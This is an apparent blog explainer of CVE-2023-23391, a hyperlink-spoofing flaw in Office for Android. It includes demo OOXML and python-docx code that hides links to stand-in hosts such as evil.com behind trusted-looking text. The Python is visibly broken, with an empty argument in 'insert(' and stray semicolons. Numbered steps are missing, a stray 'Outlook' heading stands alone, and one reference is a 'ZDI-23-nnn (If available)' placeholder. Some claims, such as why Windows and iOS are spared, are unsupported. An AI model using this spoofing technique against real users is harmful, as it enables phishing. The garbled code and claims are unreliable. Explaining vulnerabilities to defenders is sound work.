CVE-2023-23391 - Explaining the Office for Android Spoofing Vulnerability

Earlier in 2023, Microsoft disclosed a security vulnerability tracked as CVE-2023-23391 that affects Microsoft Office on Android devices. This flaw deals with spoofing, meaning a malicious actor can make something look legitimate when it isn't—tricking users into opening malicious links, believing they're from a trustworthy source.

In this article, we’ll break down what CVE-2023-23391 is, how it could be exploited, and what you should do to stay safe if you use Office for Android products like Word, Excel, PowerPoint, or Outlook. We'll include demonstration code and links to original advisory and responsible sources for further reading.

What is CVE-2023-23391?

CVE-2023-23391 is officially described as a “Microsoft Office for Android Spoofing Vulnerability.” In simple terms, this flaw allows an attacker to make Office for Android apps show misleading information when handling hyperlinks. Normally, if you click a safe link in an Office document, you expect to go where the link says you will. But with this vulnerability, attackers could hide a dangerous link behind text or images, so you might not realize you’re headed to a fake site, or even download malware.

Microsoft’s Official Advisory

- Microsoft Security Guidance for CVE-2023-23391

How Does the Exploit Work?

The vulnerability is all about link spoofing in Office documents on Android. Attackers can embed a hyperlink in a document so that the *visible text* or *displayed URL* fools the user, masking the malicious destination. Here’s how a typical attack might go:

The attacker crafts an Office document (Word, Excel, etc) with a hyperlink that *appears* safe.

2. The display text says something like https://accounts.microsoft.com, but the hidden link actually goes to http://phishing-evil.com.

The attacker sends this document via email or cloud sharing to the victim.

4. The victim opens the doc in Office for Android and clicks the link, believing it’s safe—when really it takes them to the attacker’s malicious website.

On Android versions affected, Office would not clearly warn or show the mismatch, leaving the user exposed.

Exploit Demonstration

Here’s a simple Office document XML snippet (for Word or Excel) that hides a real link behind a fake display:

<w:hyperlink r:id="rId5">
    <w:r>
        <w:rPr>...</w:rPr>
        <w:t>https://trusted-site.com</w:t>; <!-- what the user sees -->
    </w:r>
</w:hyperlink>

But in the document’s relationships file

<Relationship Id="rId5"
  Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink";
  Target="http://attacker-evil.com";
  TargetMode="External"/>

So while it *looks* like a safe Microsoft site, clicking it will send you to the attacker’s website instead.

You can even insert a malicious hyperlink in a Word doc using this Python (with python-docx)

from docx import Document

doc = Document()
p = doc.add_paragraph()
# This shows "https://safe-site.com"; but leads to "http://evil.com";
run = p.add_run("https://safe-site.com";)
part = doc.part
r_id = part.relate_to('http://evil.com';, 'http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink';, is_external=True)
hyperlink = doc._element.xpath('//w:r')[-1]
hyperlink.getparent().insert(, hyperlink) 
# Note: real exploit would use raw XML, Office for Android mishandles the shown vs actual link.

doc.save("spoofed_link.docx")

On affected Office for Android, users wouldn’t get clear verification or warning.

Outlook

Other operating systems (Windows, iOS) do *not* appear affected in the same way, due to their sandboxing and improved hyperlink previews.

How Dangerous is This?

It may sound like a simple trick, but spoofed links are the number one way attackers phish users—stealing passwords, banking information, or installing malware. When a trusted app like Office fails to warn users about link mismatches, it’s easy for someone to get fooled.

Phishing is already a billion-dollar cybercrime industry—the easier it is to trick users, the greater the risk for everyone.

Official References

- Microsoft Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23391
- NIST National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2023-23391
- Community Write-up: https://www.zerodayinitiative.com/advisories/ZDI-23-nnn/ *(If available)*

Final Thoughts

The CVE-2023-23391 Office for Android Spoofing Vulnerability highlights how even trusted tools can be exploited by attackers in subtle ways. Always keep your software up-to-date, and remember—if it looks too good to be true, or if you’re being hurried to click a link, slow down and check it out first.

For security professionals, this CVE is a reminder: mobile apps sometimes lag in security parity with their desktop siblings. For users: routinely update your apps, stay vigilant, and report any suspicious activity.

Stay safe!

If you have questions about mobile Office security, Microsoft’s Security Portal is a great place to start.


Remember: Education is your favorite patch against phishing and spoofing attacks—keep yourself and your colleagues informed!

Timeline

Published on: 03/14/2023 17:15:00 UTC
Last modified on: 03/21/2023 15:06:00 UTC